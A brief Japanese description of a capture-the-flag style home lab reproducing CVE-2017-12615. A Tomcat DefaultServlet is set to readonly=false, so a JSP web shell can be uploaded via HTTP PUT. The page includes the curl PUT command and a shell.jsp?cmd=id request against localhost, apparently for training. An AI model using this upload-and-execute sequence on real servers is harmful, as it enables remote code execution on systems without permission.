
CVE-2017-12615 Tomcat: JSPアップロードによるリモートコード実行 レッドチーム・ペネトレーションテストのためのホームラボ
このラボは CVE-2017-12615 Tomcat: JSPアップロードによるリモートコード実行 をシミュレートしています。Apache Tomcat の DefaultServlet が次のように誤って設定されています。
readonly=false
これにより、攻撃者は HTTP PUT を介して .jsp ファイルをアップロードし、リモートコード実行が可能になります。
readonly=false で DefaultServlet をオーバーライド.jsp ファイルを書き込みflag_RANDOM.txtcurl -v -X PUT "http://localhost:8080/shell.jsp/" -H "Content-Type: text/plain" --data-binary @shell.jsp
http://localhost:8080/shell.jsp?cmd=id
/tmp/flag_RANDOM.txt
教育、研究、および許可された侵入テストのみを目的としています。